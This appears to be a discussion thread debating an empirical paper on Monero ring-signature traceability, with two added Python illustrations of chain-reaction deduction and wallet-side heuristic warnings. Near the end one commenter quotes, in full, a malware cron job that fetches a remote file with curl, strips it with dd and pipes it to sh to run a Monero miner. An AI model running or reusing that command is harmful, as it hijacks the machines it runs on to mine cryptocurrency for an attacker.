Intellectually and academically dishonest hit piece by peddlers of a competing cryptocoin.
That this subset of transactions is not safe is not news, nor is it even original research - it was covered in research more than 2 years ago by The Monero Project itself - and is something the project has addressed since and is working to further improve even beyond the recommendations of this paper.
Andrew Miller does not hide his ties to Zcash; I believe none of the other authors are associated with Zcash. I do not think he needs to recuse himself from academic study of competing currencies, just because he has loose ties to Zcash.
Also, the authors do not hide the fact that the vulnerability is not new. Most science is incremental; I haven't seen any evidence of 'academic dishonesty'.
This paper is an empirical analysis. The Monero reports introduced a theoretical attack with conditions, e.g. “a critical loss in untraceability across the whole network if parameters are poorly chosen and if an attacker owns a sufficient percentage of the network.”
The news is that our research confirms, for the first time, that this is actually the case, and it affects actual transactions.
It is not true that this result was previously known. Please see the section “Comparison with related work on Monero linkability.” in the paper (https://monerolink.com), which starts "We note that earlier reports from Monero Research Labs (MRL-0001 [10] and MRL-0004 [7]) have previously discussed concerns about such deduction, called a “chain-reaction,” based on similar insights as described above. However, our results paint a strikingly different picture than these." and then goes on to show those striking differences between the new results and the previous knowledge.
I hope someone actually reads the original Monero Research Lab papers and sees that those papers briefly allude to there being a problem and dismiss it as being a theoretical problem, when at the time of the report people's drug purchases could and can still be traced. This is an empirical analysis - the first of its kind with a block explorer; the Monero people should be on their knees thanking the authors of the paper. Instead they are burying their heads in the sand, refusing to admit that they lied when they claimed back in 2015/16 that their currency was untraceable. I'm disgusted to see the flagrant doublethink in the comments here; most people haven't even bothered to read the paper or the MRL reports and are just spouting garbage they've heard via fluffyass.
You couldn't buy drugs with Monero until the end of 2016 when, coincidentally, RingCT was hard-forked in and this paper's entire basis for existence disappeared.
Also two of the Monero Research Lab papers both identify and quantify the problem, and then suggest solutions to it. At no point do the papers dismiss them as theoretical: https://pbs.twimg.com/media/C9nIqDmUQAAqP-R.jpg:large
MRL-0001 is nearly 7000 words, the entirety of which is devoted to showing how dangerous mixin-0 transactions are (i.e. the bulk of this 'empirical analysis' paper). MRL-0004 similarly consists of nearly 7000 words, although this time they don't only have an entire section devoted to "traceability with zero mix-in spending", but they cover knock-on effects of banning them ("change and dust force zero mix spending"). They then identify further issues including "temporal associations", "association by use of outputs within a transaction", and "combinatorial attacks to reveal outputs".
The MRL-0004 paper provides a roadmap to defeating some of these by forcing a minimum ring size, but notes that a perfect output selection strategy could not (at the time, as now) be determined. They note that "although we have identified this security issue, we are not making formal recommendations yet until we have further data to inform our choices".
Subsequent to that the Monero developers switched to a triangular distribution for selection, and then more recently they added a %-of-outputs-must-be-recent scheme (I can't recall what %). This, combined with the advent of RingCT, has defeated the claims of the research paper. There is no double-think about older transactions, because nobody could use them for anything of note, and it was during a time when 'fluffyass' kept telling people not to buy Monero (which I believe he continues to do).
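As an added illustration (not code from the paper, the MRL reports or the Monero project), here is the "chain-reaction" deduction that the comments above argue over, run over a constructed set of ring-signature inputs; the input and TXO names are made up for the example.

```python
# Added example: the "chain-reaction" deduction over constructed rings.
# Each input lists the TXOs in its ring (decoys plus the one really spent).
# A 0-mixin input reveals its spent TXO outright; a TXO can be spent only
# once, so it is struck from every other ring, which may leave another ring
# with a single candidate, and so on until nothing more can be deduced.
from typing import Dict, List, Set


def chain_reaction(rings: Dict[str, List[str]]) -> Dict[str, str]:
    """Return {input_id: spent TXO} for every input that becomes deducible."""
    candidates: Dict[str, Set[str]] = {i: set(r) for i, r in rings.items()}
    deduced: Dict[str, str] = {}
    changed = True
    while changed:
        changed = False
        for inp, cands in candidates.items():
            if inp in deduced:
                continue
            if not cands:
                raise ValueError(f"{inp}: every ring member is already spent elsewhere")
            if len(cands) == 1:
                txo = next(iter(cands))
                deduced[inp] = txo
                changed = True
                # Strike the now-known-spent TXO from all other rings.
                for other, ocands in candidates.items():
                    if other != inp:
                        ocands.discard(txo)
    return deduced


def deducible_fraction(rings: Dict[str, List[str]], min_mixins: int = 1) -> float:
    """Share of inputs with at least `min_mixins` mixins whose real spend is
    deducible, i.e. the statistic the paper reports for inputs with mixins."""
    eligible = [i for i, r in rings.items() if len(r) - 1 >= min_mixins]
    if not eligible:
        return 0.0
    deduced = chain_reaction(rings)
    return sum(1 for i in eligible if i in deduced) / len(eligible)


# Constructed sample: in1 and in2 are 0-mixin spends; in3's two decoys are
# exactly those TXOs, so it collapses; in4 and in5 keep two candidates each.
SAMPLE_RINGS = {
    "in1": ["o1"],
    "in2": ["o2"],
    "in3": ["o1", "o2", "o3"],
    "in4": ["o3", "o4", "o5"],
    "in5": ["o3", "o4", "o6"],
}
```

Running `deducible_fraction(SAMPLE_RINGS)` on this sample gives the share of mixin-carrying inputs that the 0-mixin spends alone expose, which is the kind of figure the thread is disputing.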
Amiller, Figure 1 should show that the overwhelming majority of Zcash transactions have the privacy properties of Bitcoin transactions (or worse).
No? It seems kind of imbalanced to have an analysis which emphasizes the security compromises caused by older monero (pre-CT, pre minimum mixin count) while ignoring the ongoing privacy flaw in Zcash usage in practice.
> should show that the overwhelming majority of Zcash transactions have the privacy properties of Bitcoin transactions (or worse).
Agreed, this should be updated to specify that only transactions between shielded addresses are protected. The point they are trying to make is that the anonymity set between shielded addresses is that of all transactions in the anonymous set. (FWIW, this is a pre-publication draft.)
> No? It seems kind of imbalanced to have an analysis which emphasizes the security compromises caused by older monero (pre-CT, pre minimum mixin count)
ZCash is pretty explicit about the difference between shielded and transparent addresses...
However, the news here isn't about ZCash. Monero's main claim to fame is that it has an "opaque" blockchain, but this isn't cryptographically ensured. Instead, it relies on each client to create dummy transactions that mirror real ones. That leaves Monero wide open to side channel attacks now and in the future.
One would expect careful analysis and much more cautious language. Instead, it looks like clients weren't even doing basic checks:
> We find that among Monero transaction inputs with one or more mixins, 62% of these are deducible, i.e. they can be incontrovertibly linked to the prior TXO they spend.
It's a solid piece of research and even if Monero fixes everything in this upcoming release, that doesn't make this analysis any less worrying.
Are you talking about the fact that Zcash has, as a feature, the ability to make non-anonymous payments as well? Why would this be of interest to anyone studying the anonymity properties of Monero?
Speaking about criminals using Monero, they've started making ransomware that accepts Monero. As far as I know, they don't for the other supposed-anonymous cryptocurrencies.
There was Bitcoin malware back when CPU mining was feasible. If memory serves me correctly, someone figured out it would be break-even serving ads with JS bitcoin miners.
In my opinion, this is an attempt at smearing a better cryptocurrency competing for the same recognition: true anonymity.
It could very well be the tip of a broader, coming attack. The developers of other cryptocurrencies are spending money for marketing and acceptance into exchanges, Monero is not.
They are willing to grease the wheels to success while Monero grows organically instead. This may or may not be a problem for Monero. If they run a smear-campaign on Monero, they could win with their inferior cryptocurrency.
>They are willing to grease the wheels to success while Monero grows organically instead.
I'm curious about this. How is this at all a virtue? If you're not willing to hustle to ensure the success of your project, why should anyone make a bet on it? We've seen many times how the technically superior product loses out against the better positioned competitor. So what makes this different?
Regardless of the veracity of your allegations, this paper is a sound empirical analysis. It's a solid piece of research, and it's not surprising that folks from a competing blockchain would be the first to unveil real problems with Monero.
I mean come on, it's OK to cherry-pick xmr's blockchain and post sensationalist and exaggerated tweets, but not OK to do the same for Zcash...
Their academic integrity has obviously lost it from their financial incentives. Will be very hard to 'trust' these guys again, wouldn't 'trust' the 'trusted setup' that was needed for Zcash for a billion dollars now...
Heuristic I is not applicable to RingCT, so moving on...
Heuristic II is basically people sending a transaction to themselves and thus creating 2 new TXOs (amount and change). Then at some point people spend both TXOs in one transaction. This is something that can be avoided by just not sending coins to yourself and by the wallet giving you a warning when you are about to spend 2 TXOs stemming from the same TXO.
Heuristic III is basically the fact that the newest TXO in a transaction is likely the one that is being spent and can be prevented by people actually keeping a small reserve of XMR and refilling this at random intervals. Don't spend all your XMR all at once just after you received it.
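As an added illustration of the wallet-side warning suggested above (not code from the Monero wallet or the paper), the following checks flag Heuristic II and Heuristic III exposure before a transaction is signed; the data classes, field names and sample inputs are assumptions of this example.

```python
# Added example: wallet-side warnings for the two heuristics.
# Heuristic II: spending two TXOs created by the same earlier transaction
# (payment plus change of a self-send) links them to each other.
# Heuristic III: the newest ring member is the likely real spend, so a real
# TXO that is newer than every decoy in its ring is weakly hidden.
# The data classes and field names are assumptions made for this example.
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class RingMember:
    txo_id: str
    height: int  # block height at which the TXO was created


@dataclass
class PlannedInput:
    real: RingMember        # the TXO actually being spent
    parent_tx: str          # id of the transaction that created `real`
    decoys: List[RingMember]


def heuristic_ii_warnings(inputs: List[PlannedInput]) -> List[str]:
    """Flag groups of inputs whose real TXOs all stem from one parent transaction."""
    by_parent: Dict[str, List[str]] = {}
    for inp in inputs:
        by_parent.setdefault(inp.parent_tx, []).append(inp.real.txo_id)
    return [f"inputs {sorted(ids)} all stem from tx {tx}"
            for tx, ids in by_parent.items() if len(ids) > 1]


def heuristic_iii_warnings(inputs: List[PlannedInput]) -> List[str]:
    """Flag inputs whose real TXO is strictly newer than every decoy in its ring."""
    return [f"{inp.real.txo_id} is the newest member of its ring"
            for inp in inputs
            if all(d.height < inp.real.height for d in inp.decoys)]


def check_inputs(inputs: List[PlannedInput]) -> List[str]:
    """All warnings a wallet should show before signing this set of inputs."""
    return heuristic_ii_warnings(inputs) + heuristic_iii_warnings(inputs)


# Constructed sample: both inputs come from one self-send (tx_self), and the
# change output is newer than both of its decoys.
SAMPLE_INPUTS = [
    PlannedInput(RingMember("o_pay", 900), "tx_self",
                 [RingMember("d1", 950), RingMember("d2", 880)]),
    PlannedInput(RingMember("o_change", 1000), "tx_self",
                 [RingMember("d3", 700), RingMember("d4", 950)]),
]
```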
pero | 9 years ago
Lengthy discussion on reddit here: https://www.reddit.com/r/Monero/comments/65dj7u/an_empirical...
socrates1024 | 9 years ago
We found tens of thousands of transactions that included ten or more mixins but could still be traced.
kovrik | 9 years ago
Just today at work we've found malware on some of our servers. That malware added this cron job:
/60 * * * curl http://img1.imagehousing.com/0/art-825604.jpg -k|dd skip=2316 bs=1|sh
If you execute that command (without | sh part) and save output into .sh script, you'll see that it is running a miner (consuming lots of CPU) for this Monero pool: xmr.crypto-pool.fr:3333
See: https://www.sophos.com/en-us/medialibrary/PDFs/technical-pap...
Casseres | 9 years ago
There is a much better/detailed response to the claims made in the paper on Reddit:
https://www.reddit.com/r/Monero/comments/65pon8/monero_linka...
mirimir | 9 years ago
I mean, this is the same document:
https://ipfs4uvgthshqonk.onion.to/ipfs/QmWYTeggKeL8xBitA8uQW...